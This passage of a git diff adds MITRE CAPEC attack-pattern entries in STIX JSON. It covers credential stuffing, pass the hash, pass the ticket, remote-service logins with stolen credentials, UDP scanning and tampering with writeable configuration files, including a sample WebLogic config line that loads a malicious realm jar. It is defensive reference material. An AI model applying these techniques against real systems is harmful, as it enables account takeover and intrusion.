    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.
  3. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

  4. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each username/password combination until the target grants access.

  2. Techniques
    Manually or automatically enter each username/password combination through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.\n The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.\n Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.\n Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. 
Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "A known list of username/password combinations.", + "A custom script that leverages the credential list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Credential Stuffing attack is very straightforward." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json new file mode 100644 index 0000000000000000000000000000000000000000..a0950787ae1fe878d7fe95f0af506ba3da8bd05f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json 
@@ -0,0 +1,139 @@ +{ + "id": "bundle--88f28930-9fa6-42d1-9bd4-aa7b8d8527a9", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "external_references": [ + { + "external_id": "CAPEC-644", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Hash", + "external_id": "T1550.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/002" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason", + "external_id": "REF-580", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + }, + { + "description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation", + "external_id": "REF-581", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "How Pass-the-Hash works, Microsoft Corporation", + "external_id": "REF-582", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute", + "external_id": "REF-583", + "source_name": "reference_from_CAPEC", + "url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283" + } + ], + "id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application 
during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

  2. Techniques
    An adversary purchases breached Windows credential hash value pairs from the dark web.
    An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

  1. Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.

  2. Techniques
    Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "The adversary possesses known Windows credential hash value pairs that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Window credential hash value pairs for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json new file mode 100644 index 0000000000000000000000000000000000000000..c4ce88d7e2fee276a5b2d25b9252b6896061f6d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json 
@@ -0,0 +1,83 @@ +{ + "id": "bundle--ac9e8470-4635-4e2b-b6ed-f46e5ee678c1", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", + "external_references": [ + { + "external_id": "CAPEC-645", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Ticket", + "external_id": "T1550.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/003" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "modified": 
"2020-07-30T00:00:00.000Z", + "name": "Use of Captured Tickets (Pass The Ticket)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs physical access to the victim system.", + "The use of a third-party credential harvesting tool." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.", + "Low": "Determine if Kerberos authentication is used on the server." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json new file mode 100644 index 0000000000000000000000000000000000000000..aa0dcba56444a84135b2fd8d63c4e58dc1d6cdc0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json 
@@ -0,0 +1,42 @@ +{ + "id": "bundle--da039cb2-0553-4b45-b243-bbbcef385587", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-435", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/435.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Instant Rapport", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json new file mode 100644 index 0000000000000000000000000000000000000000..31c9bb68cf9c446f4cf07b6ec673aa5519c5a441 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json 
@@ -0,0 +1,96 @@ +{ + "id": "bundle--166a8c6c-2412-4410-bede-9eea8069da67", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.", + "external_references": [ + { + "external_id": "CAPEC-555", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services", + "external_id": "T1021", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021" + }, + { + "description": "Email Collection:Remote Email Collection", + "external_id": "T1114.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1114/002" + }, + { + "description": "External Remote Services", + "external_id": "T1133", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + } + ], + "id": 
"attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Remote Services with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.", + "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json new file mode 100644 index 0000000000000000000000000000000000000000..fb411a5f87f7bbfe39d69d5c534d52117248ff79 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--d09b00cd-66be-4092-a8bf-3dd885546af6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-13 : Subverting Environment Variable Values\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-264", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/264.html" + } + ], + "id": "attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Environment Variable Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json new file mode 100644 index 0000000000000000000000000000000000000000..7465874a6f8f6ca67a26db19bd4e437a20db55fb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json 
@@ -0,0 +1,87 @@ +{ + "id": "bundle--adb95240-6b88-4395-8777-7e2a6197220d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port.", + "external_references": [ + { + "external_id": "CAPEC-308", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC768 - User Datagram Protocol, 1980--08---28", + "external_id": "REF-158", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc768.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 
51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6", + "modified": "2022-02-22T00:00:00.000Z", + "name": "UDP Scan", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ca34308-a8e4-40b6-becd-3ff95bac628a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. An adversary sends UDP packets to target ports.

  2. An adversary uses the response from the target to determine the port's state. Whether a port responds to a UDP packet is dependant on what application is listening on that port. No response does not indicate the port is not open.

", + "x_capec_extended_description": "\n During a UDP scan, a datagram is sent to a target port. If an 'ICMP Type 3 Port unreachable' error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. UDP scanning is slower than TCP scanning. The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.\n ", + "x_capec_prerequisites": [ + "The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply." + ], + "x_capec_resources_required": [ + "The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb.json new file mode 100644 index 0000000000000000000000000000000000000000..88bb989f727281a0460531f3e9eb72fa9106c2d5 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb.json 
@@ -0,0 +1,92 @@ +{ + "id": "bundle--2ea1bdda-a06e-4a67-9a5f-a12e922a0e90", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.", + "external_references": [ + { + "external_id": "CAPEC-75", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Configuration Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml\n < CustomRealmConfigurationData=\"java.util.Properties\"Name=\"CustomRealm\"RealmClassName=\"Maliciousrealm.jar\"/>\n \n The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. 
Given the complexity of server configuration, these changes may be very hard for administrators to detect.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Configuration files must be modifiable by the attacker" + ], + "x_capec_skills_required": { + "Medium": "To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json new file mode 100644 index 0000000000000000000000000000000000000000..2e6e244e08132af17b99457c825c993e18b80a95 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json 
@@ -0,0 +1,116 @@ +{ + "id": "bundle--de716e2a-a3d4-40b8-a3da-527be75f6a35", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", + "external_references": [ + { + "external_id": "CAPEC-62", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/62.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1275", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1275.html" + }, + { 